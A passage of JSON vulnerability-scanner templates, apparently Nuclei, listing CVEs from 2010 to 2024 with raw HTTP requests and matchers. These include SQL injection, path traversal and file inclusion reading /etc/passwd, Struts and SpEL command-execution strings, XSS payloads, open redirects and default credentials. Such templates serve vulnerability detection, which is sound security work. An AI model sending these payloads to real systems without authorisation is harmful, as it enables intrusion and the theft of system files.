{{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302","regex('^-1$', body)","contains(content_type,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-32231","info":{"name":"Stash < 0.26.0 -  SQL Injection","severity":"critical"},"requests":[{"raw":["POST /graphql HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json\n\n{\"operationName\":\"FindPerformers\",\"variables\":{\"filter\":{\"q\":\"\",\"page\":1,\"per_page\":40,\"sort\":\"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -\",\"direction\":\"ASC\"},\"performer_filter\":{}},\"query\":\"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\\n  findPerformers(\\n    filter: $filter\\n    performer_filter: $performer_filter\\n    performer_ids: $performer_ids\\n  ) {\\n    count\\n    performers {\\n      ...PerformerData\\n      __typename\\n    }\\n    __typename\\n  }\\n}\\n\\nfragment PerformerData on Performer {\\n  id\\n  name\\n  disambiguation\\n  url\\n  gender\\n  twitter\\n  instagram\\n  birthdate\\n  ethnicity\\n  country\\n  eye_color\\n  height_cm\\n  measurements\\n  fake_tits\\n  penis_length\\n  circumcised\\n  career_length\\n  tattoos\\n  piercings\\n  alias_list\\n  favorite\\n  ignore_auto_tag\\n  image_path\\n  scene_count\\n  image_count\\n  gallery_count\\n  movie_count\\n  performer_count\\n  o_counter\\n  tags {\\n    ...SlimTagData\\n    __typename\\n  }\\n  stash_ids {\\n    stash_id\\n    endpoint\\n    __typename\\n  }\\n  rating100\\n  details\\n  death_date\\n  hair_color\\n  weight\\n  __typename\\n}\\n\\nfragment SlimTagData on Tag {\\n  id\\n  name\\n  aliases\\n  image_path\\n  parent_count\\n  child_count\\n  __typename\\n}\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["converting driver\\.Value type string \\(\\\\\"3.*?\\\\\"\\) to a int: invalid syntax"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37881","info":{"name":"SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/siteguard/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"SiteGuard WP Plugin\")"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-register.php"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-27199","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/../admin/diagnostic.jsp","{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp","{{BaseURL}}/update/../admin/diagnostic.jsp"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"Debug Logging\", \"CPU & Memory Usage\")"],"condition":"and"}]}]},{"id":"CVE-2024-3136","info":{"name":"MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?template=../../../../../../../../usr/local/lib/php/pearcmd&+config-create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stm_lms_load_content&nonce={{nonce}}&\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_2),\"config-create: must have 2 parameters\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["\"load_content\":\"(\\w+?)\""],"group":1,"internal":true,"name":"nonce"}]}]},{"id":"CVE-2024-5827","info":{"name":"Vanna - SQL injection","severity":"critical"},"requests":[{"raw":["POST /api/v0/train HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"sql\":\"SELECT pg_read_file('/etc/passwd', 0, 1000);\"}\n"],"matchers":[{"type":"word","words":["id\":"],"internal":true}]},{"raw":["GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2024-28255","info":{"name":"OpenMetadata - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(interactsh_protocol, 'dns')","contains(body, \"java.lang.Boolean\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2024-37843","info":{"name":"Craft CMS <=v3.7.31 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type:application/json\n\n{\"query\":\"query  IntrospectionQuery  {assets(orderBy: \\\"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\\\", limit: 5){filename}}\"}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General error: 1105 XPATH syntax error: '\\n{{matcher}}"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2024-45388","info":{"name":"Hoverfly < 1.10.3 - Arbitrary File Read","severity":"high"},"requests":[{"raw":["PUT /api/v2/simulation HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"data\":{\"pairs\":[{\"request\":{},\"response\":{\"bodyFile\": \"../../../../../../../etc/passwd\",\"x\":\"aaa\"}} ]},\"meta\":{\"schemaVersion\":\"v5.3\"}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","hoverflyVersion"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-46310","info":{"name":"FXServer < v9601 - Information Exposure","severity":"medium"},"requests":[{"raw":["GET /players.json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"endpoint\", \"id\", \"identifiers\", \"name\", \"ping\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-FaceThumb ==="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5(\"{{string}}\");?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["2 Click Social Media Buttons","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["MF Gig Calendar ="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["All-in-One Event Calendar"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Wordpress Integrator"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/yousaytoo-auto-publishing-plugin/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Download Monitor ="]}]},{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory 